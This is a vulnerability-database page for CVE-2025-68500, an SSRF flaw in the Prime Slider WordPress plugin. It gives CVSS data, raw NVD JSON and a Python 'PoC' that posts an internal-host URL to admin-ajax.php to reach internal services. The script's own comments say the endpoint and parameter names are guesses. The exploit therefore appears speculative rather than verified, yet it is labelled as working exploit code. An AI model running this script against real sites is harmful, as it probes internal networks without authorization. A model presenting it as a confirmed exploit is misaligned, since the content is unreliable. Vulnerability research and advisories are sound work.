Security Vulnerability Report
中文
CVE-2025-68500 CVSS 4.9 MEDIUM

CVE-2025-68500

Published: 2025-12-24 13:16:20
Last Modified: 2026-04-27 19:16:26

Description

Server-Side Request Forgery (SSRF) vulnerability in bdthemes Prime Slider – Addons For Elementor bdthemes-prime-slider-lite allows Server Side Request Forgery.This issue affects Prime Slider – Addons For Elementor: from n/a through <= 4.0.10.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

bdthemes-prime-slider-lite <= 4.0.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68500 PoC - Prime Slider SSRF # Target: WordPress site with bdthemes-prime-slider-lite <= 4.0.10 import requests import sys from urllib.parse import urlencode def exploit_ssrf(target_url, target_internal_host): """ Exploit SSRF vulnerability in Prime Slider plugin target_internal_host: Internal host to target (e.g., localhost, 127.0.0.1) """ # Vulnerable endpoint - typically in ajax handler or widget processing vulnerable_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Construct malicious payload to trigger SSRF # The actual parameter names may vary based on plugin version payload = { 'action': 'prime_slider_ajax_action', 'slider_url': f'http://{target_internal_host}:8080/internal-api', 'module_id': '1' } print(f"[*] Targeting: {target_url}") print(f"[*] Exploiting SSRF to: {target_internal_host}") try: response = requests.post(vulnerable_endpoint, data=payload, timeout=10) print(f"[+] Request sent. Status: {response.status_code}") print(f"[*] Response preview: {response.text[:200]}") return True except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python exploit.py <target_url> <internal_host>") print("Example: python exploit.py http://victim.com 127.0.0.1") sys.exit(1) exploit_ssrf(sys.argv[1], sys.argv[2])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68500", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:20.283", "lastModified": "2026-04-27T19:16:25.797", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery (SSRF) vulnerability in bdthemes Prime Slider – Addons For Elementor bdthemes-prime-slider-lite allows Server Side Request Forgery.This issue affects Prime Slider – Addons For Elementor: from n/a through <= 4.0.10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/bdthemes-prime-slider-lite/vulnerability/wordpress-prime-slider-addons-for-elementor-plugin-4-0-10-server-side-request-forgery-ssrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}